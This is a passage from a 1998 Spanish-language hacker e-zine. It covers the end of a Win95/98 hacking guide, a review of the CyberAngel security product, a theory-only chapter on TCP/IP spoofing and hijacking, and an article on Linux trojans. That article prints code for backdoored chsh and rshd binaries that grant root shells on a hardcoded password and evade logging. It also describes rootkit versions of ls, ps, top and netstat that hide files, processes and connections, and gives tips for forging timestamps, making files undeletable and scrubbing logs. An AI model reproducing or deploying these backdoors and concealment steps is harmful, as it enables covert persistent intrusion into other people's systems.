  3028.       etc...).
  3029.  
  3030.     - Libros de colores (Documentacion tecnica sobre seguridad en muchos
  3031.       aspectos).
  3032.  
  3033.     - News (estar en un grupo de news y asi recibir noticias de lo que pasa).
  3034.  
  3035.     - Mailing lists (aqui estaremos permanentemente informados).
  3036.  
  3037.     - IRC (podremos hablar con otros hackers y cambiar opiniones).
  3038.  
  3039.   9. Despedida.
  3040.  
  3041.   Pues aqui se acaba esta guia sobre hacking en Win95/98. Espero que os halla
  3042.   gustado y os sea util, por todo el esfuerzo que ha llevado esta guia.
  3043.  
  3044.   Por desgracia me he dejado muchas cosas en el tintero, que me hubiese
  3045.   gustado explicar pero quien sabe a lo mejor aperece una nueva entrega
  3046.   nunca se sabe :)
  3047.  
  3048.   Me gustaria descatar que a lo mejor con los ultimos puntos de la guia, te
  3049.   has quedado sorprendido respecto a su titulo y despues al ver su contenido,
  3050.   esto se debe a que he preferido dar pautas a seguir y no empezar a explicar
  3051.   cosas que ya muchos sabran o que es informacion realmente facil de
  3052.   encontrar por Internet, ademas si empiezo a explicar algunos de esos
  3053.   titulos me saldria del proposito de esta guia, que es el hacking en Win95/98
  3054.   y NO de otros sistemas operativos los cuales disponen de miles de guias
  3055.   sobre hacking.
  3056.  
  3057.   Bueno ya solo me queda despedirme y tened cuidado con lo que haces por
  3058.   Internet, ya que un hacker no se dedica a destruir sistemas informaticos.
  3059.   Y agradecer a todos los que hallan escrito sus conocimientos sobre hack
  3060.   en win95/98 para la creacion de esta guia pero por supuesto que todavia
  3061.   quedan muchas cosas mas, esto es simplemente una solida base para
  3062.   comezar en tu "alter ego" como hacker!!!.
  3063.  
  3064.    9-1. Agradecimientos.
  3065.  
  3066.   Y desde aqui saludar a todos aquellos que de alguna forma han
  3067.   participado en la creacion de esta guia, que son muchas asi como a todas
  3068.   las personas que me conocen :) Que no las listo aqui debido a que son
  3069.   muchisimas!!!!!
  3070.  
  3071.                                                             Nobody (c) 1998.
  3072.  
  3073. <────────────────────────────────────────────────────────────────────────────>
  3074. ██████████████████████████████████████████████████████████████████████████████
  3075. <────────────────────────────────────────────────────────────────────────────>
  3076.  
  3077.         CyberAngel: Un programa, un password, un monton de seguridad
  3078.         ------------------------------------------------------------
  3079.  
  3080.                           By Mac Crack & Tasslehoff
  3081.                           - J.J.F. / Hackers Team -
  3082.  
  3083.   1.- Que es CyberAngel EXR?
  3084.   2.- Como funciona?
  3085.       2.1.- Configuration Manager
  3086.       2.2.- Encriptacion
  3087.       2.3.- Passwords incorrectas
  3088.       2.4.- Alerta automatica
  3089.       2.5.- Soporte tecnico
  3090.   3.- Conclusion
  3091.  
  3092.   1.- Que es CyberAngel EXR? 
  3093.  
  3094.         CyberAngel EXR es un nuevo producto de la casa "Computer Sentry
  3095.   Software Inc." (http://www.sentryinc.com) enfocado a la seguridad de
  3096.   empresa. Es un programa que protege tus datos incluso si te han robado el
  3097.   ordenador. Lo bueno de este programa es que es muy facil de usar, tiene un
  3098.   precio razonable (unas 7000 pelas) una facil configuracion de seguridad y
  3099.   key recovery, lo unico malo es que, de momento, es un programa que solo
  3100.   funcina si se tiene un acceso via modem. Es un programa principalmente
  3101.   enfocado para portatiles y ordenadores de empresas.
  3102.  
  3103.   2.- Como funciona?
  3104.  
  3105.         El funcionamiento del programa es relativamente simple, como su
  3106.   configuracion. Se instala el programa, pero seguros de que el ordenador
  3107.   esta conectado a la red, despues de copiarse los archivos, vas a una
  3108.   especie de registracion on-line, en la cual tienes unas opciones de
  3109.   configuracion, en el cual un password es requeridos para poder registrarlo,
  3110.   o sea, que el programa debe ser original, despues seleccionas el tipo de
  3111.   notificacion que quieres que te hagan cuando alguien ha conseguido entrar
  3112.   en tu ordenador. Tu password se necesita tambien para el soporte tecnico :o)
  3113.         Bien, ahora, cada vez que enciendes o apagas tu ordenador, o bien, lo
  3114.   reseteas tendras que poner tu passwd de CyberAngel, solo que la diferencia
  3115.   con los passwds tradicionales es que en este caso no te sale una pantallita
  3116.   pidiendote el passwd, por eso, la persona que entre/robe tu ordenador no
  3117.   sera consciente de que hay una proteccion puesta.
  3118.  
  3119.   2.1.- Configuration Manager
  3120.  
  3121.         Es un interface muy sencillo y muy facil de usar para cambiar las
  3122.   preferencias del programa, requiere el disco original, tu passwd y el
  3123.   numero de serie. Esta aplicacion actualiza automaticamente la encriptacion
  3124.   de todas las "keys" (llaves) de tu ordenador.
  3125.  
  3126.   2.2.- Encriptacion
  3127.  
  3128.         La ventana de encriptacion te muestra los todos los archivos que hay
  3129.   en tu ordenador y asi puedes seleccionar los archivos que quieres encryptar
  3130.   y tambien puedes seleccionar el tipo de algoritmo de encriptacion que
  3131.   desees. Pero, por ejemplo, si copias o cambias archivos de carpetas, el
  3132.   programa los desencripta automaticamente y vuelve a encriptar siempre y
  3133.   cuando se haya metido el passwd correcto.
  3134.           El sistema de encriptacion trabaja a unos 500KB de memoria, para
  3135.   hacer el trabajo de encriptacion/desencriptacion mas o menos rapido sin
  3136.   consumir muchos redcursos del ordenador. Cada fichero o carpeta de ficheros
  3137.   puede tener algoritmos de encritpacion distintos segun los hayas elegido.
  3138.           Por ejemplo puedes elegir desde 448-bit Blowfish, 56-bit DES, o
  3139.   128-bit EXR. El tipo de encriptacion de 448 bit es generado aleatoriamente
  3140.   durante la instalacion del programa.
  3141.         CyberAngel, como muchos programas de encriptacion, no encripta
  3142.   ficheros .COM o .EXE, mas que nada por las protecciones contra reseteos,
  3143.   falta de corriente, etc. Durante la encriptacion, se genera un directorio
  3144.   de backup, el cual se borra automaticamente cuando se ha terminado la
  3145.   encriptacion y ha sido verificada correctamente por el programa. Cuando
  3146.   reseteas el ordenador y le pones de nuevo el passwd, los ficheros se
  3147.   desencriptan automaticamente y se tiene acceso a ellos, si no es correcto
  3148.   no tienes acceso.
  3149.  
  3150.   2.3.- Passwords incorrectas
  3151.  
  3152.         Que pasa si alguien mete un passwd incorrecto?, bien, la respuesta es
  3153.   sencilla, CyberAngel EXR bloquea el ordenador, es decir, te cierra todos los
  3154.   puertos de comunicaciones, impidiendo que, si esta conectado a Internet,
  3155.   puedas entrar en cuentas, por ejemplo (nota: este programa tb puede ser
  3156.   usado para los niños, es decir una escpecie de CyberPatrol o NetNanny, o sea
  3157.   de estos programas para que los niños no entren en sitios guarros :o))
  3158.           Tambien se puede usar la opcion PLUS, que lo que hace es bloquear el
  3159.   teclado y el raton, restringiendo el acceso a ficheros, para copiarlos,
  3160.   bajarlos o bien imprimirlos.
  3161.  
  3162.   2.4.- Alerta automatica
  3163.  
  3164.         CyberAngel EXR tiene un sistema de alerta automatica llamada "7x24
  3165.   CSS Security Monitoring" el cual te avisa via fax o e-mail si tu ordenador
  3166.   esta siendo utilizado sin autorizacion. El escaneo de tu ordenador lo hace
  3167.   ya este conectado desde un modem o via TCP/IP. Este escaneo lo hace el
  3168.   propio ordenador y esta intentando conectar al sistema de alerta hasta que
  3169.   consiga la linea para ello. Si el ordenador ha sido conectado a una linea
  3170.   de telefono, una red, LAN o WAN, manda una alerta encriptada, incluso quita
  3171.   el sonido al marcar para que el intruso no se de cuenta de lo que el
  3172.   ordenaodr esta haciendo.
  3173.  
  3174.   2.5.- Soporte tecnico
  3175.  
  3176.         Tambien puedes llamar inmediatamente al servicio tecnico, el cual
  3177.   calificara tu ordenador de robado y generara un informe sobre tu ordenador,
  3178.   el cual incluye el IP desde donde el ordenador realizo la alerta, el numero
  3179.   de telefono, nombre, apellidos y direccion asociados de es numero de
  3180.   telefono. Despues de esto ya es otro asunto, se le manda el informe a la
  3181.   policia.
  3182.  
  3183.   3.- Conclusion
  3184.  
  3185.         CyberAngel EXR es uno de los mejores programas del mercado para
  3186.   proteger datos. Es realmente facil de instalar y de usar. Diseñado para
  3187.   W95/98/NT. Tambien se puede hacer una instalacion en una red.
  3188.           Administradores de sistema encontraran este programa bastante util,
  3189.   ya que los usuarios podran seguir usando sus mismos passwords, asi que no se
  3190.   necesita reconfigurar para cada usuario. La encriptacion es "transparente",
  3191.   o sea que no sabes que esta haciendo el ordenador si eres un intruso.
  3192.   Cualquier password que se haya olvidado, se pueden volver a pedir al
  3193.   Monitoring Center. Es decir una buena herramienta para proteger tu
  3194.   ordenador.
  3195.  
  3196.   Preguntas, comentarios, etc...
  3197.   mac@jjf.org
  3198.   tasslehoff@jjf.org
  3199.  
  3200. <────────────────────────────────────────────────────────────────────────────>
  3201. ██████████████████████████████████████████████████████████████████████████████
  3202. <────────────────────────────────────────────────────────────────────────────>
  3203.  
  3204.                               - CURSO DE HACK -
  3205.                                  CHAPTER VII
  3206.  
  3207.         Bueno, pues aqui esta la septima entrega de vuestro curso favorito,
  3208.   aunque me gustaria saber si os esta sirviendo de algo o solo estoy
  3209.   escribiendo lineas inutilmente. Me alegraria mucho que enviarais mail
  3210.   contando vuestros progresos.
  3211.  
  3212.         Quiero dejar claro, que este curso no sigue un orden lineal, yo
  3213.   simplemente voy explicando temas y despues lo entrezalo, pero conviene que
  3214.   los lectores estudien por su cuenta, puede que algunos capitulos pueden
  3215.   ser muy faciles y otros de gran complejidad, como es el caso de hoy ;-)
  3216.   Este capitulo esta enfocado a distintos ataques en el protocolo TCP/IP. 
  3217.   No veo la necesidad de explicar el manejo de Linux al igual que el
  3218.   funcionamiento de los protocolos, por lo que asumire un cierto
  3219.   conocimiento por parte del lector en estas interesantes y desconocidas
  3220.   materias.
  3221.  
  3222.         Si al comenzar tu lectura no entiendes nada de lo aqui explicado y
  3223.   como soy un buen chico :) os pongo unas cuantas url's donde podreis
  3224.   aprender de como funciona tecnicamente el protocolo TCP/IP.
  3225.  
  3226.   http://studys.mcs.mu.edu/~chong/mscs210/protocol.html/#ftp
  3227.   http://www.cis.ohio-state.edu/htbin/rfc/arpa-internet-protocols.html
  3228.   http://sunsite.auc.dk/RFC/rfc/rfc1180.html
  3229.   http://ipprimer.2ndlevel.net/
  3230.  
  3231.         Pues ya sabes, a leer se ha dicho! Y ahora empezemos este curso.
  3232.   Para este capitulo el Linux nos sera realmente util, ya que tendremos que
  3233.   retocar las cabezeras de los paquetes que enviemos a los servidores, asi
  3234.   como distintas herramientas. Debido al peligro que puede llevar la
  3235.   informacion de este articulo, solo lo explicare teoricamente y no
  3236.   expresamente como realizarlos, pero con algo de imaginacion lo podras
  3237.   conseguir :)
  3238.  
  3239.   # Ataque de prediccion de numeros.
  3240.  
  3241.         Este ataque siempre debe ser realizado antes de cualquier otra
  3242.   variante de ataques en el protocolo. Este ataque lo realizamos con el fin
  3243.   de acceder a la red que nos interesa. Este ataque contiene 2 pasos, el
  3244.   primero seria averiguar el IP del servidor que nos interesa, esto es
  3245.   realmente facil y lo podemos hacer de muchas maneras, hacemos esto porque
  3246.   otros ordenadores de esa red comparten valores con el servidor, entonces
  3247.   imitamos una IP de la red para saltarnos el router y conseguir acceso.
  3248.   Por ejemplo:
  3249.  
  3250.      X --------------------------> 195.0.0.10 (servidor)
  3251.     Hacker                |
  3252.                           |  195.0.0.1
  3253.                              195.0.0.2
  3254.                              ...
  3255.                              195.0.0.255
  3256.  
  3257.            Aqui vemos con el hacker conoce la IP del servidor la cual es
  3258.   195.0.0.10 por lo puede conocer otros sistemas de la red, en este caso
  3259.   de clase C. Ahora que ya conoce la red, el hacker comienza a monotizar
  3260.   el numero de secuencia de los paquetes que pasan por la red. Despues de
  3261.   un rato que ya sabemos como funciona, el hacker debe intentar predecir el
  3262.   numero de secuencia del servidor y "spofear" la secuencia, para meterse
  3263.   entre el servidor y el usuario de la red. Como el hacker conoce la IP
  3264.   del server puede generar numeros de secuencia para pasarselos al servidor y
  3265.   asi engañarle. Normalmente este ataque se suele usar como base para
  3266.   atacar un servidor o un sistema de la red. Un ejemplo del engaño:
  3267.  
  3268.      X ------------------------> 195.0.0.10 (servidor)          195.0.0.15
  3269.     Hacker           |                                            Usuario
  3270.                       Simulamos que
  3271.                       somos el IP
  3272.                       195.0.0.15
  3273.  
  3274.  
  3275.    # Ataque de robo de la conexion (IP Hijacking).
  3276.  
  3277.         Este ataque posiblemente es el mas peligroso que se puede cometer
  3278.   contra un servidor (tambien es conocido como "sniffing" activo). Este
  3279.   ataque que realizamos en el protocolo TCP, fuerza al servidor a aceptar
  3280.   nuestra conexion como si fueramos un IP de confianza (trust). Basicamente
  3281.   el ataque consiste en que conseguimos acceso en uno de los sistemas de la
  3282.   red del servidor que queremos entrar, entonces desconectamos el sistema de
  3283.   la red y hacemos creer al servidor que somos realmente la IP de confianza.
  3284.   Por ejemplo:
  3285.  
  3286.      X -------------------> 195.0.0.10 ----            ------ 195.0.0.15
  3287.     Hacker       |          (servidor)          |               Usuario
  3288.                  |                              |
  3289.               Simulamos ser                   Hemos cortado 
  3290.               el IP 195.0.0.15            la conexion autentica.
  3291.  
  3292.         Este ataque es potencialmente mas peligroso que el "IP Spoofing",
  3293.   debido a que si sale exitoso, se consegui mucho mas acceso al servidor e
  3294.   incluso podemos evadir los mecanismos de seguridad.
  3295.  
  3296.   # Ataque sniffer.
  3297.  
  3298.         Este tipo de ataque el realmente comun en Internet, tambien es
  3299.   conocido como ataque pasivo. Normalmente este puede ser el primer paso
  3300.   que un hacker realiza, debido a que puede conseguir informacion para
  3301.   despues realizar otro tipo de ataque potencialmente mas peligroso. Este
  3302.   ataque seguramente es el mas facil de realizar, simplemente necesitamos
  3303.   el Login y el Password de un usuario de la red, entonces entramos en la
  3304.   cuenta y colocamos un sniffer para reunir informacion de la red.
  3305.   Por ejemplo:
  3306.  
  3307.            |-> Servidor --|
  3308.            |              |
  3309.        Sistema   RED    Sistema
  3310.            |              |--------------> X (hacker)  Copiamos los
  3311.            |-- Sistema  <-|<---------------|           paquetes TCP que
  3312.                              Paquetes TCP              vamos monotorizando.
  3313.  
  3314.         Como vemos el hacker copia todos los paquetes que pasan por la red,
  3315.   con el fin de sacar informacion para un ataque de mayor envergadura, como
  3316.   por ejemplo "IP Spoofing" o "IP Hijacking".
  3317.  
  3318.   # Ataque de desincronizacion activa.
  3319.  
  3320.         Este ataque se basa, en que el hacker fuerza a los dos sistemas de
  3321.   la comunicacion TCP a un estado de desincronizacion para que no puedan
  3322.   cambiar informacion entre si, entonces el hacker utiliza un tercer sistema
  3323.   (ordenador) que este entre la conexion TCP creando paquetes para
  3324.   remplazarlos y pasarlos a cada extremo de la conexion TCP, con lo que
  3325.   el hacker obtiene todos los paquetes de la conexion original.
  3326.  
  3327.   # Ataque de robo de previa-desincronizacion.
  3328.  
  3329.         Este ataque es una variante del Hijacking y se basa en el que el
  3330.   hacker es capaz de escuchar todos los paquetes entre los 2 sistemas que
  3331.   se estan comunicando, ademas el hacker es capaz de cambiar los paquetes
  3332.   originales por unos falsos para esconder del cliente y del servidor. Esta
  3333.   conbinacion permirte al hacker forzar la comunicacion entre el cliente
  3334.   y el servidor.
  3335.  
  3336.         Supongamos que el hacker ha conseguido desencronizar la comunicacion,
  3337.   entonces el cliente envia un paquete con la siguiente cabezera:
  3338.  
  3339.   SEG_SEQ = CLT_SEQ
  3340.   SEG_ACK = CLT_ACK
  3341.  
  3342.         Como el hacker ha desencronizado la comunicion el paquete del cliente
  3343.   no sera aceptado por el servidor debido a que la informacion es incorecta.
  3344.   Entonces el hacker copia el paquete rechazado por el servidor. Pasado un
  3345.   ratito el hacker envia el mismo paquete rechazado pero cambiando la
  3346.   cabezera:
  3347.  
  3348.   SEQ_SEQ = SVR_ACK
  3349.   SEG_ACK = SVR_SEQ
  3350.  
  3351.          Esta vez la cabezera es correcta por lo que el paquete si sera
  3352.   aceptado por el servidor. Este ataque no acaba aqui realmente pero lo dejo
  3353.   en este punto, para que os pique la curiosidad y busqueis informacion.
  3354.   Deciros que este ataque nos puede servir para saltarnos la seguridad de
  3355.   un servidor Web con SSL incluido ;-)
  3356.  
  3357.         Existen muchos ataque todavia en el TCP/IP que aqui no explico, quien
  3358.   sabe si en algun futuro numero lo hago :) Por ejemplo ACK Storm, ataques
  3359.   de Telnet, y unos nuevos ataques que se descubrieron a principios de año
  3360.   (1998), conocidos como Insercion y Evasion que permiten saltarte muchos
  3361.   IDS (Sistema de deteccion de Intrusos).
  3362.  
  3363.         Lo mejor para aprender sobre este tipo de cosa es siempre tener a
  3364.    mano los famosos RFC y Linux o FreeBSD, herramientas que nos permitan
  3365.    cambiar los paquetes, asi como interceptarlos, etc...
  3366.  
  3367.   Byes all y hasta la vista !!
  3368.    
  3369.                                                         CONDE VAMPIRO
  3370.                                                   - J.J.F. / HACKERS TEAM -
  3371.  
  3372. <────────────────────────────────────────────────────────────────────────────>
  3373. ██████████████████████████████████████████████████████████████████████████████
  3374. <────────────────────────────────────────────────────────────────────────────>
  3375.  
  3376.              ****************************************************
  3377.              **               Troyanos en Linux                **
  3378.              ****************************************************  
  3379.  
  3380.         Holas. He decidido escribir este articulo para ayudar a la gente que
  3381.   esta empezando en esto del hack, bueno.. empezando empezando no, tiene que
  3382.   tener un nivel minimo; saber manejarse algo en entornos unix, algo de
  3383.   programacion en C (tarde o temprano tendras que aprender), y cosas de ese
  3384.   estilo, pero mas o menos creo que cualquiera que tenga unos minimos
  3385.   conocimientos le sacara provecho. Tampoco va a ser un supertexto, mas bien
  3386.   sera un texto practico que servira para aclarar ideas de que es un troyano,
  3387.   como instalarlo, etc., y por si alguien lo esta pensando no se trata de
  3388.   troyanos tipo "Bo" y similares, sino que seran troyanos aplicables solo al
  3389.   entorno linux.
  3390.  
  3391.   .- Que es un troyano?
  3392.  
  3393.         Pues es, mas o menos, un programa modificado a tu gusto que lo pones
  3394.   sobreescribiendo al original, de forma que las modificaciones que hayas
  3395.   hecho te sirvan para algo claro, por ejemplo que te den root facilmente y
  3396.   sin huellas, para ocultar cosas al administrador (directorios, conexiones),
  3397.   etc.
  3398.  
  3399.   .- Tipos basicos de troyanos.
  3400.  
  3401.         Yo mas o menos los he dividido en 3 tipos; troyanos para conseguir
  3402.   root local, troyanos para conseguir root remoto y troyanos para ocultar
  3403.   cosas de todo tipo como pueden ser directorios, procesos, conexiones, etc.
  3404.  
  3405.   *- Troyanos para conseguir root local:
  3406.   --------------------------------------
  3407.  
  3408.         Estos troyanos normalmente siempre se colocan nada mas haber obtenido
  3409.   root en la makina. Esto se hace asi porque normalmente se instalan en un
  3410.   segundo, ya que son muy simples, y te evita comerte el coco para conseguir
  3411.   root otra vez si es que al administrador le da por parchear el bug por el
  3412.   que has conseguido privilegios, aunque esto deberias hacerlo tu por etica y
  3413.   tal..., aparte que asi te evitas que vengan otros y se te apoderen
  3414.   facilmente de "tu" sistema jeje.
  3415.  
  3416.         Troyanos de este tipo por ejemplo son el chsh, que es un programa que
  3417.   sirve para cambiarte la shell, por ejemplo de bash a zsh. Al ejecutarlo te
  3418.   pide una nueva shell, por lo que es muy facil modificarlo para que dandole
  3419.   una shell determinada te habra una shell con uid 0. Por cierto que los
  3420.   troyanos que salgan en este articulo los podeis conseguir en
  3421.   http://welcome.to/neptuno
  3422.  
  3423.         Como no voy a poner todo el codigo fuente aqui, pongo las lineas que
  3424.   estan modificadas y las explico un poco. Las fuentes de linux es muy
  3425.   recomendable tenerlas a mano y las podeis conseguir o de los cds de debian
  3426.   (p.ejemplo), o de ftp.rediris.es (login:ftp), en el directorio
  3427.   /linux/debian/source.
  3428.  
  3429.         Los troyanos muchas veces se hacen con simples ifs (condicionales) y
  3430.   poco mas. En este caso lo que hace es declarar un entero con int elite=0; y
  3431.   un password con char clave[6]=peper; al principio del fichero (sino sabeis C
  3432.   lo tendreis un poco chungillo pa entender esto pero bueno). Peper sera lo
  3433.   que tengais que poner cuando os pida la nueva shell al ejecutar el programa.
  3434.  
  3435.   Ahora pego la chicha del codigo.
  3436.  
  3437.   if (!strcmp(shell,clave)) elite++; /* --> Aqui compara la shell con nuestro
  3438.                                             password (peper) y si son iguales
  3439.                                             pone elite a 1 */
  3440.                     
  3441.   if (!elite) { /* --> Todo esto se la salta si elite esta a 1, o sea si
  3442.                        metimos el password correcto */
  3443.  
  3444.     if (check_shell (shell) < 0) return (-1);
  3445.  
  3446.     if (! strcmp (pw->pw_shell, shell)) {
  3447.         printf ("Shell not changed.\n");
  3448.         return 0;
  3449.     }
  3450.     if (!strcmp(shell, "/bin/sh")) shell = "";
  3451.     pw->pw_shell = shell;
  3452.     if (setpwnam (pw) < 0) {
  3453.         perror ("setpwnam");
  3454.         printf( "Shell *NOT* changed.  Try again later.\n" );
  3455.         return (-1);
  3456.     }
  3457.     printf ("Shell changed.\n");
  3458.     return 0; }
  3459.     if (elite) { /* Aqui si elite esta a 1 pone nuestro uid y gid a 0, o sea
  3460.             el del root, setea HISTFILE para evitar el .bash_history
  3461.             y ejecuta una shell */
  3462.  
  3463.         setreuid(0,0);
  3464.         setregid(0,0);
  3465.         setenv("HISTFILE","",1);
  3466.         system("/bin/bash");
  3467.         }
  3468.   }
  3469.  
  3470.         Y eso es todo, ya tenemos un troyano que al ejecutarlo y darle de
  3471.   shell peper nos abrira una shell de root. Por cierto, que este troyano para
  3472.   funcionar tiene que tener suid de root, pero como el chsh original tambien
  3473.   lo tiene es dificil que el administrador se de cuenta del cambio. Recordad
  3474.   que la fuente entera la podeis bajar de http://welcome.to/neptuno . Chsh
  3475.   normalmente esta en /usr/bin.
  3476.  
  3477.   *- Troyanos para conseguir root remoto:
  3478.   ---------------------------------------
  3479.  
  3480.         Este otro tipo de troyanos se utiliza para mantener el acceso a la
  3481.   makina hackeada. De esta forma es muy facil entrar como root desde fuera,
  3482.   evitando todos los logs que deja hacer un simple telnet a una cuenta.
  3483.  
  3484.         El tipico troyano de este tipo es el del programa login, normalmente
  3485.   situado en /bin. Lo que pasa que este programa es bastante complejo (sobre
  3486.   todo si el password esta shadow), por lo que no me iba a tirar yo aqui horas
  3487.   explicando y pegando mogollon de codigo fuente (en mi page pondre en breve
  3488.   uno hecho por mi por si a alguien le interesa), asi que pondre uno mas
  3489.   sencillo como puede ser el del rshd.
  3490.  
  3491.         El rshd es un servicio parecido al rlogin, pero que en vez de abrirte
  3492.   una shell permite ejecutar comandos remotos, lo que no quita que tu puedas
  3493.   ejecutar el comando /bin/bash por ejemplo abriendote una cuenta. Pues bien,
  3494.   el objetivo es que haciendo un rsh a la makina con un login determinado el
  3495.   programa ejecute el comando que tu le digas con uid 0, incluido el /bin/bash
  3496.   y practicamente sin logs. Para que funcione tendras que sobreescribir el
  3497.   original, normalmente en /usr/sbin/in.rshd, y que el servicio este activado
  3498.   en el /etc/inetd.conf claro. Pasemos a la explicacion..
  3499.  
  3500.         Lo primero que hace es declarar un entero con int elite=0;, o sea,
  3501.   igual que antes con el chsh. Luego declara el password que se va a usar para
  3502.   entrar como root con char clave[6]=peper;, por cierto que si cambias peper
  3503.   por otra clave acuerdate de modificar el 6 por el numero de letras que
  3504.   tenga +1. Luego hay esto..
  3505.  
  3506.         getstr(locuser, sizeof(locuser), "locuser");
  3507.         getstr(cmdbuf, sizeof(cmdbuf), "command");
  3508.         if (!strcmp(locuser,clave)) { elite++; strcpy(locuser,"root"); }
  3509.  
  3510.         En esta ultima linea esta todo el troyano; compara el login (o sea el
  3511.   usuario) con el nuestro, y si coinciden pone elite a 1 y copia el string
  3512.   root al login. Como veis casi todos los troyanos hacen cosas muy parecidas.
  3513.   Despues ya ahi cosas tipicas, como:
  3514.  
  3515.         if ((paranoid || pwd->pw_uid == 0)&&(!elite)) {
  3516.                     syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: cmd='%s'",
  3517.                         remuser, hostname, locuser, cmdbuf);
  3518.  
  3519.         que lo que hace es evitar el syslog si entramos con nuestra clave,
  3520.   etc. Para usar el troyano, despues de haber sobreescrito el
  3521.   /usr/sbin/in.rshd, hay que hacer un rsh -l nuestraclave(peper_en_este_caso)
  3522.   makina.com /bin/bash. Despues hay que borrar nuestra entrada del
  3523.   /var/log/secure, ya que ese log el troyano no lo evita, en cambio si setea
  3524.   el HISTFILE, o sea el .bash_history.
  3525.  
  3526.         Bueno, y con eso ya tenemos garantizado el acceso remoto como root, y
  3527.   por si falla ya tenemos un troyano local para entrar con una cuenta de un
  3528.   usuario y conseguir root facilmente. Ahora lo que viene ya son troyanos
  3529.   para sacar provecho de esa makina; poner algun bot, bouncers, ocultar
  3530.   sniffers, etc. Por cierto, y ya no lo repito mas, que los troyanos los
  3531.   podeis encontrar en http://welcome.to/neptuno (bueno, y en miles de sitios
  3532.   de internet claro).
  3533.  
  3534.   *- Troyanos para ocultar directorios, procesos..etc.
  3535.   ----------------------------------------------------
  3536.  
  3537.         Ahora llegan los troyanos para ocultar ficheros, procesos, conexiones,
  3538.   o sea, para ocultar todo lo ocultable jeje (tranquilos que ya keda poco de
  3539.   texto ;).
  3540.  
  3541.         Para empezar esta el troyano de ls, que normalmente estara en /bin/ls
  3542.   (Ahora ya pasare de poner los codigos porque sino me enrollo mucho y mas o
  3543.   menos son todos iguales). Como decia este troyano sirve para ocultar
  3544.   ficheros y directorios, y para funcionar necesita tener la referencia en un
  3545.   archivo de donde vaya sacando los nombres de ficheros y directorios a
  3546.   ocultar. Puedes poner los nombres dentro del codigo y te ahorras el archivo
  3547.   ese, pero no creo que sea plan andar compilando todo el dia cada vez que
  3548.   quieras ocultar un nuevo fichero (y aparte que tendrias que subirlo de nuevo
  3549.   a la makina cada vez). Normalmente en el codigo hay una linea que pone algo
  3550.   asi como #define PATH "/dev/ptyr", que es el archivo de donde cogera los
  3551.   datos, que por cierto yo que tu lo cambiaba ahora mismo, mas que nada
  3552.   porque ya estan muy vistos. Bueno, pues despues de haber sobreescrito el
  3553.   /bin/ls con el troyano, si por ejemplo quieres ocultar un directorio con
  3554.   nombre pepito pues en /dev/ptyr añades una linea con la palabra pepito, y
  3555.   lo mismo con los archivos. Por cierto, supongo que no hace falta que diga
  3556.   que al /dev/ptyr le añadas una linea con la palabra ptyr ;)
  3557.         (Nota: si el admin ve el directorio desde algun tipo de visor grafico
  3558.   desde las X el troyano no hara nada y vera los ficheros y directorios
  3559.   ocultos).
  3560.  
  3561.         Despues esta el troyano de ps y top, que son para ocultar procesos, el
  3562.   archivo de informacion es normalmente el /dev/ptyp, y se utiliza de la
  3563.   siguiente forma.
  3564.  
  3565.   Ej. de /dev/ptyp:
  3566.  
  3567.                0 0             Oculta todos los procesos corriendo bajo uid 0
  3568.                1 p0            Oculta todos los procesos bajo tty p0 
  3569.                2 sniff         Oculta todos los procesos cuyo nombre sea sniff
  3570.                3 hack          Oculta todos los procesos en cuya linea de
  3571.                                ejecucion aparezca la palabra hack.
  3572.                                (ej. hack makina.com -0)
  3573.  
  3574.         Hay que sobreescribir los originales normamente en /bin/ps y
  3575.   /usr/bin/top, el fichero ptyp es el mismo para los dos. Si consigues este
  3576.   troyano, al igual que el de ls en algun rootkit y no te compila bajatelos
  3577.   de la web que llevo repitiendo todo el articulo, ya que estan optimizados
  3578.   para libc6 (supongo que en tambien libc5 compilaran).
  3579.  
  3580.         Bueno, y por ultimo keda el del netstat, que sirve para ocultar
  3581.   conexiones, puertos abiertos, etc etc. Ya se que hay 2.235.678,93 de
  3582.   troyanos mas pero sino este articulo me ocuparia paginas y paginas, a parte
  3583.   de que estos son los mas basicos. Y sino os bajais algun rootkit que traen
  3584.   muchisimos, lo que pasa que tambien muchisimos no compilaran porque faltan
  3585.   librerias, archivos de cabezera.. etc :(
  3586.  
  3587.         Bueno, lo que iba diciendo, el del netstat. Normalmente el archivo de
  3588.   informacion de este es /dev/ptyq, y esta organizado de la siguiente forma,
  3589.   que ilustrare con un ejemplo :)
  3590.  
  3591.                0 500           <- Oculta las conexion hechas por el uid 500
  3592.                1 128.31        <- Oculta las conexiones desde 128.32.xx.xx
  3593.                2 128.31.39.20  <- Oculta las conexiones a 128.31.39.20
  3594.                3 8000          <- Oculta todas las conexiones al puerto local
  3595.                                   8000
  3596.                4 6667          <- Oculta todas las conexiones al puerto remoto
  3597.                                   6667
  3598.                5 .term/socket  <- Oculta este socket
  3599.  
  3600.         El fichero modificado hay que copiarlo sobreescribiendo el
  3601.   /bin/netstat, y hay que poner siempre ips, si pones hosts no funcionara.
  3602.  
  3603.   *- Consejos finales
  3604.   -------------------
  3605.  
  3606.   Pues ahi van unos consejos que a mi al menos me son de utilidad:
  3607.  
  3608.         1.- Cuando metas un troyano fijate bien en los permisos para que tenga
  3609.   los del programa origal, y que el dueño y el grupo sea el mismo.
  3610.  
  3611.         2.- Para que no llame mucho la atencion la fecha haz un touch -r
  3612.   fichero_de_referencia troyano, asi el troyano quedara con la fecha del
  3613.   fichero de referencia.
  3614.  
  3615.         3.- Con chattr +i troyano el fichero no se podra borrar, ni siquiera
  3616.   el root podra a no ser que ponga chattr -i troyano.
  3617.  
  3618.         4.- Si la makina no tiene activado el ftp y no sabes como subir los
  3619.   troyanos, haz un ftp a tu ordenador desde alli y bajatelos.
  3620.  
  3621.   *- Despedida
  3622.   ------------
  3623.  
  3624.         Bueno, esto ya se ha acabado. Recordad bajaros los troyanos completos
  3625.   de http://welcome.to/neptuno, ya que aqui no los he podido incluir por
  3626.   razones de espacio.
  3627.  
  3628.         Un saludo a mi novia, y a toda la peña del canal #hacker_novatos,
  3629.   especialmente a ulan, sp4rk, kr0n0, MaNiaK, Case, Freedom (fundandor de la
  3630.   pagina del canal) y a alguno mas que se me olvida. Ah!, y no olvideis
  3631.   pasaros por el canal de vez en cuando ;) Byes.
  3632.  
  3633.   PoSiDoN
  3634.   posidon@poboxes.com
  3635.  
  3636. <────────────────────────────────────────────────────────────────────────────>
  3637. ██████████████████████████████████████████████████████████████████████████████
  3638. <────────────────────────────────────────────────────────────────────────────>
  3639.  
  3640.                   Todo (o casi todo) sobre el SMURFING v1.0
  3641.                   -----------------------------------------
  3642.  
  3643.                                 Mac Crack
